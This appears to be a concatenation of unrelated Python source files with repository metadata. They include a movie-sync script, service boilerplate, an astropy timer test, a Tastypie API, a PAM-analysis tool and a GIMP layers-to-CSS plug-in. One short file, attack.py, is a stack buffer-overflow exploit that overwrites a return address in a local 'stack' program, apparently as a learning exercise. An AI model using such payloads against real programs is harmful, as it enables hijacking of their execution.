#!/usr/bin/python # -*- coding: utf-8 -*- from models import * def syncMovie(l_movie): movies = Movie.select().where(Movie.movie_number == l_movie.number) if movies.count() == 0: print(' missing movie data: ' + l_movie.number) return movie = movies.get() if l_movie.video_status == 'FHD': movie.movie_status = 'fhd_done' elif l_movie.video_status == 'HD': movie.movie_status = 'hd_done' elif l_movie.video_status == 'SD': movie.movie_status = 'sd_done' movie.save() l_movie.video_sync = True l_movie.save() def main(): l_movies = L_JPN_Movie.select().where(L_JPN_Movie.video_sync == False) for l_movie in l_movies: print('begin to sync movie: ' + l_movie.number) syncMovie(l_movie) if __name__ == '__main__': main()
UTF-8
Python
false
false
2,013
13,039,520,732,520
f9ab925bcdc29ab79a1b362a8ace5949dffc1e48
56e7be69d923dd86e15e56ac5ccff3447357ed6c
/ion/services/coi/exchange/exchange_boilerplate.py
b52ed355790989a1ed540591915eecaa78967c7c
[ "LicenseRef-scancode-proprietary-license" ]
non_permissive
nimbusproject/lcaarch
https://github.com/nimbusproject/lcaarch
9d59477f4ce1595f1e12962202a0d51a4f5db5cf
01f98003969960614c467b41a7da8113c0393532
refs/heads/cei
2020-07-05T01:30:15.634580
2011-02-11T07:18:47
2011-02-11T07:18:47
910,688
0
3
null
false
2015-09-29T05:16:15
2010-09-14T19:04:37
2013-09-28T12:14:12
2011-03-07T22:21:50
3,600
2
1
1
Python
null
null
#!/usr/bin/env python """ @file ion/play/hello_resource.py @author David Stuebe @brief An example service definition that can be used as template for resource management. """ import ion.util.ionlog import ion.util.procutils as pu from ion.core.process.process import ProcessFactory, Process, ProcessClient from ion.core.process.service_process import ServiceProcess, ServiceClient from ion.core.messaging.message_client import MessageClient from ion.core.object import object_utils from ion.core import ioninit from ion.services.coi.resource_registry_beta.resource_client import ResourceClient, ResourceInstance from ion.services.coi.resource_registry_beta.resource_client import ResourceClientError, ResourceInstanceError from twisted.internet import defer CONF = ioninit.config(__name__) log = ion.util.ionlog.getLogger(__name__) resource_request_type = object_utils.create_type_identifier(object_id=10, version=1) resource_response_type = object_utils.create_type_identifier(object_id=12, version=1) exchangespace_type = object_utils.create_type_identifier(object_id=1001, version=1) exchangename_type = object_utils.create_type_identifier(object_id=1001, version=1) queue_type = object_utils.create_type_identifier(object_id=1001, version=1) binding_type = object_utils.create_type_identifier(object_id=1001, version=1) class ExchangeManagementError(Exception): """ An exception class for the Exchange Management system. """ class ServiceHelper: def __init__(self, proc): self.proc = proc self.rc = ResourceClient(proc=proc) self.mc = MessageClient(proc=proc) def check_request(self, msg, type): """ """ if msg.MessageType != resource_request_type: raise ExchangeManagementError('wrong message type: %s' % str(msg.MessageType)) if msg.HasField('resource_reference'): raise ExchangeManagementError('resource_reference field expected to be unset, received: %s' % msg.resource_reference) @defer.inlineCallbacks def create_object(self, msg, name, description): object = msg.configuration type = object.ObjectType object = yield self.rc.create_instance(type, name, description) yield defer.returnValue(object) @defer.inlineCallbacks def push_object(self, object): yield self.rc.put_instance(object) response = yield self.mc.create_instance(exchangespace_type, name='create_instrument_resource response') response.resource_reference = self.rc.reference_instance(object) response.configuration = object.ResourceObject response.result = 'Created' yield defer.returnValue(response) class ClientHelper: def __init__(self, proc): self.proc = proc self.mc = MessageClient(proc=proc) @defer.inlineCallbacks def create_object(self, type): msg = yield self.mc.create_instance(resource_request_type, name='create_object') msg.configuration = msg.CreateObject(type) defer.returnValue(msg)
UTF-8
Python
false
false
2,011
10,943,576,700,525
fe735acb2298098dc1cceaba930f1daa85c50bca
6e81a449c6a75d6e478b626f72245a41156b9198
/astropy/utils/tests/test_timer.py
e5e28dac300766291e431d0015567e03c3bfb20d
[]
no_license
askielboe/astropy
https://github.com/askielboe/astropy
15aed53fe8b64ab6d16e22ff39c70ff3ddfc30bf
358303ca0439c48e69902293297932db99b3dfd4
refs/heads/master
2021-01-18T07:24:50.242590
2013-02-27T06:43:54
2013-02-27T06:43:54
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Licensed under a 3-clause BSD style license - see LICENSE.rst """Test `astropy.utils.timer`. .. note:: The tests might fail if function being timed deviates from expected run time by more than `ACCURACY_DECIMAL` decimals. """ # STDLIB import time # THIRD-PARTY import numpy as np # LOCAL from ..timer import RunTimePredictor ACCURACY_DECIMAL = 3 # For np.testing.assert_almost_equal() def func_to_time(x): """This is sleeps for x seconds for timing tests.""" time.sleep(x) return 'Slept for {0} second(s)'.format(x) class TestRunTimePredictor(object): """Test `astropy.utils.timer.RunTimePredictor`.""" def setup_class(self): self.p = RunTimePredictor(func_to_time) def test_expected_errors(self): try: self.p.do_fit() except AssertionError as e: assert str(e) == 'Requires 3 points but has 0' try: self.p.predict_time(100) except AssertionError as e: assert str(e) == 'No fitted data for prediction' def test_baseline(self): self.p.time_func([0.1, 0.2, 0.5, -1, 1.5]) self.p.time_func(1.0) assert self.p._funcname == 'func_to_time' assert self.p._cache_bad == [-1] assert self.p.results == {0.1: 'Slept for 0.1 second(s)', 0.2: 'Slept for 0.2 second(s)', 0.5: 'Slept for 0.5 second(s)', 1.5: 'Slept for 1.5 second(s)', 1.0: 'Slept for 1.0 second(s)'} def test_fitting(self): a = self.p.do_fit() assert self.p._power == 1 np.testing.assert_almost_equal(a, (1, 0), ACCURACY_DECIMAL) def test_prediction(self): t = self.p.predict_time(100) assert round(t) == 100 # Repeated call to access cached run time t2 = self.p.predict_time(100) assert t == t2
UTF-8
Python
false
false
2,013
10,557,029,651,587
d039045d12fad4a74b176ad4580ef2f6cdf9de73
a0797e0ecb4dbd25d2c004fa65852661f3f7b52f
/attack.py
09ed3c610ef88550c1a993e91dbe79ff17720053
[]
no_license
wufan0920/stack-overflow
https://github.com/wufan0920/stack-overflow
effcfec9304398f6178e729b72145308994c0b95
6451a3478005e699ccc6fb1d64c48c9fe95b94f2
refs/heads/master
2016-08-07T05:05:10.221819
2014-08-05T15:20:53
2014-08-05T15:20:53
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import os cmd = './stack ' attack_str = cmd + '1'*512 + '\x14' + '\x84' + '\x04' + '\x08' os.system(attack_str)
UTF-8
Python
false
false
2,014
12,206,297,090,460
fa9bf94a9deb8c441225c8d0dbbacca6bda03352
73d728df82f1d4a1d8054ee3cbcd104becf0592e
/server/apps/acl/api.py
87227a7b446a50955cab4dfda6310752a22346c7
[ "MIT" ]
permissive
Ecotrust/usvi
https://github.com/Ecotrust/usvi
4c5399deef08bf9f3b7e3364240c47cc3227fd30
454e1f8d6ff97548595ddaecd023c5db3b08f7bc
refs/heads/master
2020-04-06T04:36:41.367825
2014-05-29T17:27:06
2014-05-29T17:27:06
13,626,648
0
0
null
false
2014-08-07T01:17:45
2013-10-16T17:51:17
2014-06-19T21:29:22
2014-05-29T17:27:09
44,594
1
3
80
JavaScript
null
null
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS from tastypie.contrib.contenttypes.fields import GenericForeignKeyField from tastypie import fields from .models import AnnualCatchLimit, Species, SpeciesFamily, AREA_CHOICES, SECTOR_CHOICES from survey.api import SurveyModelResource, StaffUserOnlyAuthorization class SpeciesResource(SurveyModelResource): class Meta: ordering = ['name'] queryset = Species.objects.all().order_by('name') authorization = StaffUserOnlyAuthorization() filtering = { 'name': ['icontains'], } class SpeciesFamilyResource(SurveyModelResource): class Meta: queryset = SpeciesFamily.objects.all().order_by('name') authorization = StaffUserOnlyAuthorization() filtering = { 'name': ['icontains'], } class AnnualCatchLimitResource(SurveyModelResource): by_species = fields.BooleanField(readonly=True, attribute="by_species") species = GenericForeignKeyField({ Species: SpeciesResource, SpeciesFamily: SpeciesFamilyResource }, 'species', full=True, null=True) def alter_detail_data_to_serialize(self, request, bundle): if 'meta' not in bundle.data: bundle.data['meta'] = {} bundle.data['meta']['area_choices'] = AREA_CHOICES bundle.data['meta']['sector_choices'] = SECTOR_CHOICES return bundle def alter_list_data_to_serialize(self, request, bundle): if 'meta' not in bundle: bundle['meta'] = {} bundle['meta']['area_choices'] = AREA_CHOICES bundle['meta']['sector_choices'] = SECTOR_CHOICES return bundle def get_object_list(self, request): objects = super(AnnualCatchLimitResource, self).get_object_list(request) user_tags = [tag.name for tag in request.user.profile.tags.all()] if 'puerto-rico' not in user_tags: objects = objects.exclude(area='puertorico') if 'usvi' not in user_tags: objects = objects.exclude(area='stcroix') objects = objects.exclude(area='stthomasstjohn') return objects class Meta: always_return_data = True queryset = AnnualCatchLimit.objects.all() authorization = StaffUserOnlyAuthorization() filtering = { 'area': ALL, }
UTF-8
Python
false
false
2,014
10,127,532,890,852
723fbabe72cada149dd9052db3b3021dc1d0c90d
4fe6c1e3e86c443b2c866bfd0e41e949c886ba26
/get_interesting_pams.py
1d424991c333b90c6eea9c47fe11538f706644c7
[]
no_license
xl0/adaptation
https://github.com/xl0/adaptation
ef3873f4b0127eaee0ab45f92fb13978474ffe71
250f35eb3cd9833412361826a845e4b273a55005
refs/heads/master
2020-12-24T17:44:29.468469
2014-09-15T16:59:01
2014-09-15T16:59:01
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python2.7 import os import sys from Bio import SeqIO from collections import defaultdict, OrderedDict import matplotlib matplotlib.use("Agg") from matplotlib import pyplot import argparse import json from utils import * def main(): parser = argparse.ArgumentParser(description='Extract spacers that consistently hit top or bottom 10%') parser.add_argument('inputs', metavar='<frequency.json>', type=str, nargs='+', help='Input file with PAMs and spacers annotated.') parser.add_argument('-o', metavar='out_file.json', required=True) args = parser.parse_args() print 'Extracting consistent top/bottom 20%% %s -> %s' % ( ' '.join(args.inputs), args.o) data_dict = OrderedDict() top_pam_dict = defaultdict(list) bottom_pam_dict = defaultdict(list) for infile in args.inputs: data = json.load(open(infile)) experiment = data['experiment'] tag = data['tag'] hits = data['stats']['hit_spacers_good_pam'] pams = data['pams'] # Sorted bottom to top pam_list = sorted(pams.keys(), key = lambda e: pams[e]) # Top/bottom 20% bottom_pams = pam_list[0:len(pam_list) / 8] top_pams = pam_list[(len(pam_list) * 8) / 10:] for pam in bottom_pams: bottom_pam_dict[pam].append(float(pams[pam]) / hits) for pam in top_pams: top_pam_dict[pam].append(float(pams[pam]) / hits) template = data['template_seq'] num_measurements = len(args.inputs) all_top_pams = {} all_bottom_pams = {} for pam, numbers in top_pam_dict.iteritems(): all_top_pams[pam] = (len(numbers), float(sum(numbers)) / len(numbers)) for pam, numbers in bottom_pam_dict.iteritems(): all_bottom_pams[pam] = (len(numbers), float(sum(numbers)) / len(numbers)) print 'Top 10:' print json.dumps(all_top_pams, sort_keys=True, indent=4) print 'Bottom 10:' print json.dumps(all_bottom_pams, sort_keys=True, indent=4) output = { 'top_pams' : all_top_pams, 'bottom_pams' : all_bottom_pams, 'template' : template, 'num_measurements' : num_measurements } json.dump(output, open(args.o, 'wr+'), sort_keys=True, indent=4) if __name__ == '__main__': main()
UTF-8
Python
false
false
2,014
11,252,814,351,339
2b3bffcc3132329793781d033b7d8e74e969d1fd
25f0fbab74b5e9adbcae0aa097512c8538f93247
/plug-ins/export_layers_to_css.py
d0b9f7fc47b4cacbf4ce4858c48dc451b21c9a78
[]
no_license
rad73/gimp-export-layers-to-css
https://github.com/rad73/gimp-export-layers-to-css
4da54c393902dd9333ec8339e35af5b9c23ad5f8
8af36bf5e2a21df7fc56296061c9bdbfae77b47d
refs/heads/master
2021-05-11T17:59:56.018785
2012-08-01T17:56:06
2012-08-01T17:56:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python # -*- coding: <utf-8> -*- # Author: Chris Mohler <[email protected]> # Copyright 2009 Chris Mohler # "Only Visible" and filename formatting introduced by mh # License: GPL v3+ # Version 1.0 # GIMP plugin to export layers as PNGs from gimpfu import * import os, re gettext.install("gimp20-python", gimp.locale_directory, unicode=True) class Css(object): def css_label(self, text): css_invalid_chars = re.compile("[^-_\w]") label = css_invalid_chars.sub('_', text.decode('utf-8').encode('ascii', 'ignore')) number_start = re.compile("^([0-9])") label = number_start.sub(lambda match: "_" + match.group(0), label) return label def find_name(self, text): name_pattern = re.compile("\.([-_\w]+)") match = name_pattern.search(text) if match: return match.group(1) else: raise Exception("Not named") def __init__(self, base_name, scale, only_named): self.layer_name_count = {} self.base_name = base_name self.graphics_name = self.css_label(base_name) self.image_filename = base_name + ".png" self.scale = scale self.only_named = only_named self.css = "" self.html = "" def add_layer(self, layer): if self.only_named: name = self.find_name(layer.name) else: name = self.css_label(layer.name) if name in self.layer_name_count: self.layer_name_count[name] += 1 name = "%s-%d" % (name, self.layer_name_count[name]) else: self.layer_name_count[layer.name] = 0 self.css += """ .{graphics_name}.{layer_name} {{ background-image: url({image_filename}); width: {width}px; height: {height}px; background-position: 0px {position_y}px; }}""".format(graphics_name=self.graphics_name, layer_name=name, image_filename=self.image_filename, width=int(layer.width / self.scale), height=int(layer.height / self.scale), position_y=-int(layer.offsets[1] / self.scale)) self.html += """ <tr> <td>{layer_name}</td> <td><div class="{graphics_name} {layer_name}"></div></td> </tr>""".format(graphics_name=self.graphics_name, layer_name=name) def save(self, path, image_width): self.save_css(path, image_width) self.save_html(path) def save_css(self, path, image_width): css_filepath = os.path.join(path, self.base_name + ".css"); self.css += """ .{graphics_name} {{ background-size: {width}px; }}""".format(graphics_name=self.graphics_name, width=int(image_width / self.scale)) with open(css_filepath, "wb") as f: f.write(self.css) def save_html(self, path): html_filepath = os.path.join(path, self.base_name + ".html"); self.html = """ <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Graphics</title> <style> table {{ border-collapse: collapse; }} td, th {{ border: dotted thin black; }} </style> <link rel="stylesheet" href="{base_name}.css"></link> </head> <p>elements with classes {graphics_name} and ...</p> <body> <table> <tr> <th>class</th> <th>element</th> </tr>""".format(base_name=self.base_name, graphics_name=self.graphics_name) + self.html + """ </table> </body> </html>""" with open(html_filepath, "wb") as f: f.write(self.html) def export_layers_to_css(img, drw, path, scale=1, only_named=False): base_name = "graphics-" + img.name.rsplit('.', 1)[0] pdb.gimp_message('Only named: %d'%only_named) dupe = img.duplicate() css = Css(base_name=base_name, scale=scale, only_named=only_named) def parse_layers(layers, level=0, offset_y=0): for layer in layers: layer.visible = True if hasattr(layer, "layers") and layer.layers: offset_y = parse_layers(layer.layers, level+1, offset_y) else: layer.set_offsets(0, offset_y) try: css.add_layer(layer) offset_y += layer.height except: layer.visible = False return offset_y offset_y = parse_layers(dupe.layers) merged_layer = dupe.merge_visible_layers(EXPAND_AS_NECESSARY) # pdb.gimp_message('Done. offset_y=%d image.height=%d'%(offset_y, merged_layer.height)) css.save(path=path, image_width=merged_layer.width) image_filename = base_name + ".png" image_filepath = os.path.join(path, image_filename); pdb.file_png_save(dupe, merged_layer, image_filepath, image_filename, 0, 9, 1, 1, 1, 1, 1) gimp.delete(dupe) register( proc_name=("python-fu-layers-to-css"), blurb=("Export Layers to one PNG with CSS stylesheet"), help=("""Export Layers to one PNG with CSS stylesheet """), author=("Per Rosengren"), copyright=("Stunning AB"), date=("2012"), label=("to _CSS"), imagetypes=("*"), params=[ (PF_IMAGE, "img", "Image", None), (PF_DRAWABLE, "drw", "Drawable", None), (PF_DIRNAME, "path", "Save PNG and CSS here", os.getcwd()), (PF_INT, "scale", "The scale of the image", 1), (PF_BOOL, "only_named", "Only export layers named .<name>", False), ], results=[], function=(export_layers_to_css), menu=("<Image>/File/E_xport Layers"), domain=("gimp20-python", gimp.locale_directory) ) main()
UTF-8
Python
false
false
2,012